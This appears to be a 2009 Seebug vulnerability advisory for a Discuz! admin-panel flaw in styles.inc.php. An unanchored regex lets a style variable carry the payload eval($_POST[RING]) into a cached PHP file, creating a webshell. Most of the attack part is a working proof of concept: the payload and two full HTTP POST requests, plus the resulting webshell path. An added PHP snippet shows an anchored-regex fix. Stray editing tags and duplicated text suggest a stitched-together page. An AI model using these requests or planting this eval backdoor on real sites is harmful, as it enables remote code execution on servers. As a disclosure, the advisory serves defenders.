SSV:11825 | www.seebug.org | Root | Jul 17, 2009

Discuz! admin\styles.inc.php get-webshell bug


In the file admin\styles.inc.php the code reads:

if($newcvar && $newcsubst) {
	if($db->result_first("SELECT COUNT(*) FROM {$tablepre}stylevars WHERE variable='$newcvar' AND styleid='$id'")) {
		cpmsg('styles_edit_variable_duplicate', '', 'error');
	// note: the pattern carries no ^ and $ anchors, so it only requires an identifier-like substring
	} elseif(!preg_match("/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/", $newcvar)) {
		cpmsg('styles_edit_variable_illegal', '', 'error');
	}
	$newcvar = strtolower($newcvar);
	$db->query("INSERT INTO {$tablepre}stylevars (styleid, variable, substitute)
		VALUES ('$id', '$newcvar', '$newcsubst')");
}
</grgr_replace>
<gr_replace lines="27" cat="clarify" orig="上面代码可以看出来">
From the code above it can be seen that a user who already holds admin-panel privileges can edit a style and, in the custom template variable field, insert the variable name  !','80VUL');EVAL($_POST[RING]);//  with the substitute value  exp by ring04h! . The name passes the preg_match check because the pattern is not anchored: any input that merely contains an identifier-like substring satisfies it. The value is then written into the style cache file, giving a remotely reachable webshell that executes code.

上面代码可以看出来当有后台权限时,可通过编辑风格,自定义模板变量处插入<strong> !',‘80VUL’);EVAL($_POST[RING]);// </strong> 替换出插入 exp by ring04h!,远程写入webshell执行代码.
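The following PHP snippet is an added example, not Discuz! code: it places the unanchored pattern from styles.inc.php beside an anchored replacement and runs both over constructed inputs, including the variable name quoted above. The names PATTERN_UNANCHORED, PATTERN_ANCHORED and is_valid_stylevar_name are assumptions made for this illustration.

```php
<?php
// Added example (not Discuz! code): anchored vs. unanchored validation of a
// custom style-variable name, using the character class from styles.inc.php.

// The pattern as it appears in styles.inc.php: no ^ ... $ anchors, so it
// matches any input that merely contains an identifier somewhere inside it.
const PATTERN_UNANCHORED = '/[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*/';

// Hardened pattern: anchored at both ends. The D modifier makes $ match only
// at the very end of the string, so a trailing "\n" cannot slip through.
const PATTERN_ANCHORED = '/^[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*$/D';

// Hypothetical helper: the check a hardened styles.inc.php would apply.
function is_valid_stylevar_name(string $name): bool
{
    return preg_match(PATTERN_ANCHORED, $name) === 1;
}

// Constructed sample inputs: a legitimate name, the variable name quoted in
// the advisory, and a name with a trailing newline (rejected only thanks to D).
$samples = [
    'headerbg',
    "!','80vul');eval(\$_post[ring]);//",
    "headerbg\n",
];

foreach ($samples as $name) {
    printf("%-42s unanchored=%-6s anchored=%s\n",
        json_encode($name, JSON_UNESCAPED_SLASHES),
        preg_match(PATTERN_UNANCHORED, $name) === 1 ? 'pass' : 'reject',
        is_valid_stylevar_name($name) ? 'pass' : 'reject');
}
```

Run it with the php command-line interpreter. The unanchored pattern passes all three inputs; the anchored pattern accepts only headerbg and rejects the advisory's payload on its first character. A bare $ without the D modifier would still accept the newline-terminated name, which is why the modifier is part of the hardened pattern.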

Vendor (Discuz!): the vulnerability has been reported; an official patch is pending.


POC:

step1:

POST /bbs/admincp.php?action=styles HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.80vul.com/bbs/admincp.php?action=styles
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.80vul.com
Content-Length: 154
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: 

formhash=99238f2d&anchor=&updatecsscache=0&namenew%5B1%5D=%C4%AC%C8%CF%B7%E7%B8%F1&availablenew%5B1%5D=1&defaultnew=1&newname=exp&stylesubmit=%CC%E1%BD%BB

step2:

POST /bbs/admincp.php?action=styles&operation=edit&id=6 HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, application/x-ms-application, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.80vul.com/bbs/admincp.php?action=styles&operation=edit&id=6
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: www.80vul.com
Content-Length: 1402
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: 

formhash=99238f2d&anchor=&namenew=exp&templateidnew=1&stylevar%5B249%5D=1&stylevar%5B247%5D=&stylevar%5B248%5D=&stylevar%5B246%5D=&stylevar%5B250%5D=&stylevarbgimg%5B250%5D=&stylevarbgextra%5B250%5D=&stylevar%5B251%5D=&stylevarbgimg%5B251%5D=&stylevarbgextra%5B251%5D=&stylevar%5B252%5D=&stylevarbgimg%5B252%5D=&stylevarbgextra%5B252%5D=&stylevar%5B253%5D=&stylevar%5B254%5D=&stylevar%5B255%5D=&stylevar%5B256%5D=&stylevar%5B257%5D=&stylevar%5B258%5D=&stylevar%5B259%5D=&stylevar%5B260%5D=&stylevar%5B261%5D=&stylevar%5B262%5D=&stylevar%5B263%5D=&stylevar%5B264%5D=&stylevar%5B265%5D=&stylevar%5B266%5D=&stylevar%5B267%5D=&stylevar%5B268%5D=&stylevar%5B269%5D=&stylevar%5B270%5D=&stylevar%5B271%5D=&stylevar%5B272%5D=&stylevar%5B273%5D=&stylevar%5B274%5D=&stylevar%5B275%5D=&stylevarbgimg%5B275%5D=&stylevarbgextra%5B275%5D=&stylevar%5B276%5D=&stylevar%5B277%5D=&stylevar%5B278%5D=&stylevar%5B279%5D=&stylevar%5B280%5D=&stylevar%5B281%5D=&stylevar%5B282%5D=&stylevar%5B283%5D=&stylevarbgimg%5B283%5D=&stylevarbgextra%5B283%5D=&stylevar%5B284%5D=&stylevarbgimg%5B284%5D=&stylevarbgextra%5B284%5D=&stylevar%5B285%5D=&stylevarbgimg%5B285%5D=&stylevarbgextra%5B285%5D=&stylevar%5B286%5D=&stylevar%5B287%5D=&stylevar%5B288%5D=&stylevar%5B289%5D=&stylevar%5B290%5D=&stylevar%5B291%5D=&newcvar=%21%27%2C%2780vul%27%29%3Beval%28%24_post%5Bring%5D%29%3B%2F%2F&newcsubst=exp+by+ring04h%21&editsubmit=%CC%E1%BD%BB


webshell:

http://www.80vul.com/bbs/forumdata/cache/style_6.php